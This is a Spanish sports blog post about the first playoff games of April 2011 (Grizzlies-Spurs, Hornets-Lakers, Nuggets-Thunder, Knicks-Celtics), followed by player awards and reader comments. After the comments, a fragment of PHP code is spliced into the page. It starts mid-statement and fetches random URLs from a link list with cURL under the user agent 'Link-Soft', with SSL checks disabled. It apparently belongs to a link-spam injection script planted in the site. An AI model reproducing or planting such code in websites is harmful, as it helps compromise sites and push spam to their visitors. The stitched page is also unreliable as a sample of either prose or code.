Playoffs (17/04/2011): Trincheras de primera ronda

18 de April de 2011 por TheDeerHunter

Los dos primeros cabezas de serie del Oeste cayeron derrotados en casa anoche en el primer partido de sus series, con los hermanos Gasol como protagonistas directos aunque en sentidos opuestos.

Marc logró, a las primeras de cambio, el hito que no llegó a alcanzar su hermano en toda su etapa en Memphis: Ganar un partido de playoffs, el primero en la corta historia de la franquicia. Lo hizo a lo grande, asaltando el Álamo, la casa de Duncan, Popovich, el equipo más fuerte de la regular en el Oeste. La parejita que forma con Zach Randolph arrasó las zonas y ni siquiera Duncan estuvo en condiciones de hacerles frente. Sin Ginobili disponible sólo las faltas forzadas por Parker y Hill con sus correspondientes tiros libres mantuvieron a los Spurs en la pomada. Y mantuvieron sus opciones para llevarse el partido con dos triples consecutivos de Bonner, pero los Grizzlies no perdieron la cabeza y otro triple de un sólido Battier logró cerrar la machada (101-98).

Pau, sin embargo, se presentó en postemporada como una versión estropeada de si mismo. Apático, distraído, descolocado, impreciso… un lastre para los Lakers. Con Okafor con problemas de faltas, los campeones desperdiciaron una gran ocasión para hacer sangre. No sirvió de nada el extraordinario partido de Kobe y Artest. Si Landry y Gray superan a Bynum, Pau y Odom poco se puede hacer. Chris Paul diseccionó a los amarillos con una facilidad pasmosa. Un simple bloqueo directo parecía una jugada indefendible para los sistemas defensivos locales. Sin pisar demasiado el acelerador, los Hornets superaron los 100 puntos y, por momentos, el 60% en tiro. Por lo visto, los Lakers aún no ven necesidad en defender… o será que simplemente no saben. Fue un querer y no poder en una de las más pobres sensaciones colectivas que nadie ha ofrecido en este primer partido (109-100).

En el Oklahoma City Arena pudimos disfrutar de un duelo alucinante. Toma y daca entre Nuggets y Thunder en un canto al nivel de juego y a la emoción de los playoffs. Los locales necesitaron una versión multiplicada de Durant y Westbrook para llevarse el partido. Los Nuggets fueron capaces de poner 8 tíos rozando los dobles dígitos, aunque no estuvieron acertados en el lanzamiento exterior, lo que les costó la derrota (103-107).

Finalmente en la otra conferencia, los Celtics también le vieron las orejas al lobo en su debut en postemporada. Amaré les hizo polvo, pero Melo tuvo problemas de faltas (alguna muy discutible) y no jugó bien. Para colmo Billups se lesionó de la rodilla y es duda para el 2º choque de la serie. No vimos una buena versión de los subcampeones. Entre Rondo, Pierce y Garnett firmaron un 16-44 y el banquillo apenas produjo. Sólido partido de Jermaine… y milagro de Ray Allen, con el enésimo triple ganador de su carrera (85-87).

PREMIOS

MVP: Exhibición histórica de Chris Paul. Sus 33 puntos (11-18), 14 asistencias y 7 rebotes solo los habían igualado o superado otros 3 jugadores en la historia de los Playoffs. Incontestable por parte de los Lakers.

Sorpresa: Chris Paul se comió a quien se le puso delante pero es que su compañero Jarrett Jack también estuvo muy acertado. 15 puntos, 4 rebotes y 5 asistencia en toda una exhibición de los bases de NO.

Decepción: Lamentable partido de Carmelo Anthony (5 de 18, 5 pérdidas) y no muy bueno de Pau Gasol (8 puntos, 6 rebotes y 6 asistencias). Sus equipos necesitan mucho más de ellos si quieren tener opciones en estos Playoffs.

Esfuerzo en vano: Amare Stoudamire fue una auténtica pesadilla para la defensa céltica. 11 rebotes y 28 puntos que pudieron ser muchos más si sus compañeros le hubiesen buscado con más ahínco.

Imágenes | AP Photos / Getty Images

Comenta

10 comentarios a esta entrada

  1. Sr. Lagarto dice:
    #1

    Lo de los Lakers está empezando a clamar al cielo, yo ya no veo el tercer anillo por ninguna parte. Por otro lado, bien por los osos¡¡¡

      Citar

  2. Pirata dice:
    #2

    Que le pasa a Pau en los partidos de domingo por la tarde:

    Media RS: 52,9% TC 18,8 PP 10,2 R 3,3 A.
    Media partidos Domingo tarde (9): 48,3% TC 15,7 PP 8,3 R 2,2 A, balance 4-5.

    Puede influir tanto el horario de los partidos en un jugador…..

      Citar

  3. Jose Luis dice:
    #3

    Yo ayer vi los tres primeros partidos, al último no llegué

    En San Antonio, pues eso, increíble la pareja interior de Grizzlies, que enchufados se comen prácticamente a cualquiera, y el perímetro bien, sobre todo en defensa. Duncan desaparecido, Parker y Hill penetrando bien y sacando tiros libres, y de los Spurs poco más se supo. Blair estuvo bien en ataque, cogiendo algún que otro rebote ofensivo y dando más batalla que McDyess y Bonner. Aún así, a punto de perder los Grizzlies con los 4 tiros libres consecutivos que fallaron.

    En Los Ángeles, apatía total de los campeones, sobre todo el interior, y muchas jugadas que cambiaban las dinámicas del partido. Cuando Lakers remontaban, perdían una pelota y triple de Paul, o cometían una falta en ataque y parcial de Hornets, cosas así que afectan mucho a lo psicológico y que dieron muchas alas a New Orleans. Si a Gasol no le despiertan ni el leñazo en la cara ni el posterior empujón de Ariza, no sé cuando va a despertar. Bryant y Artest bien, el banquillo salió el último cuarto y Phil tuvo que pedir tiempo a los dos minutos por la diferencia en el marcador. El in-and-out de Bryant en el último cuarto, también cambió la dinámica, Hornets estaban tocados viendo que Lakers metían todo, y tras esa jugada encadenaron 4 puntos consecutivos.

    Y en Boston pues a punto de saltar la banca. Stoudemire increíble, Billups muy bien, y una defensa intensísima de los Knicks durante prácticamente todo el partido. Aguantaron el primer cuarto sin Melo, y en el segundo se distanciaron gracias a él, pero en la segunda parte prácticamente ni apareció y Boston pudo remontar. Aún así, mal los Celtics, tanto moviendo el balón, aunque consiguieron varios tiros abiertos laterales a 4-5 metros, como en defensa, recuerdo muchas canastas fáciles de los Knicks. Con algo de suerte, estos últimos se llevaban el partido.

      Citar

  4. Vader dice:
    #4

    Que barbaridad Stat… lastima que no pudieramos dar la sorpresa en el primer partido. A ver si en el segundo conseguimos ganar porque si Boston se pone 2-0 la cosa estará muy difícil. Lo que esta claro es que si consiguen rodear mínimamente bien a Melo y Stat los Knicks seran un equipo muy duro de roer, son muy buenos los dos.

    Saludos

      Citar

  5. Ru dice:
    #5

    Que cerquita estuvieron los Knicks…pensaba que se vendrían abajo cuando los Celtics recortaban diferencias en el tercer cuarto pero sin embargo mantuvieron un buen nivel defensivo durante todo el partido,aunque insuficiente para ganar.Debería haber una ley que si juegas contra Ray Allen y en la última jugada no estás +4,date por muerto.Aún así,ahora mismo las sensaciones son de que puede pasar de todo..a ver si Melo sale picado en el próximo partido.

    Menuda sopresa lo de Lakers…no tanto lo de Memphis.¿Habrá sorpresa hoy en Miami?

      Citar

  6. Antoine Doinel dice:
    #6

    Creo que el mundo se merece una final del este Bulls-Celtics como la primera ronda del 2009, la mejor serie que he visto en mi vida. A ver si Boston empieza a carburar en ataque (Rondo, where are you?) y los Bulls no se relajan.

    Veo a los Lakers con más posibilidades de las que aparentan…

      Citar

  7. Txusma dice:
    #7

    @Antoine, firmo ahora mismo. Y evidentemente, firmo aún más que sean los Bulls los que pasen a la final. Y enfrentarse allí a los Lakers sería la leche…
    Pero no adelantemos acontecimientos. En nuestros análisis todos dábamos una serie de eliminatorias muy claras que no lo están siendo tanto. Puede pasar de todo, pero los números los tienen los de siempre, Lakers, Celtics, Spurs, etc.

      Citar

  8. Denise dice:
    #8

    Yo veo a los Heat son muy superiores en el Este, me da a mi que esa final que soñais va a ser que no, sobre todo por parte de Boston, que desde que largaran a Perkins no andan finos.

      Citar

  9. Sempren dice:
    #9

    El Thunder-Nuggets fue espectacular. ¡Qué bueno es Durant, por dios! Y Westbrook muy bien también.
    Por su parte, Nuggets atacó fatal el último minuto y medio, incluyendo alguna mandarina de Martin, tirando precipitadamente y muy lejos.
    Al menos en este partido vi muy forzado el jugar con Lawson y Felton juntos en ciertas fases del partido, durante un par de minutos Felton se emparejó con Durant, y claro, ahí no perdonó KD. Yo hubiera jugado más con Chandler (en el último cuarto apenas jugó), y/o con JR.

      Citar

  10. Sempren dice:
    #10

    Por cierto, a Harrington se le ve un poco fuedtecito, ¿no creéis? xD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>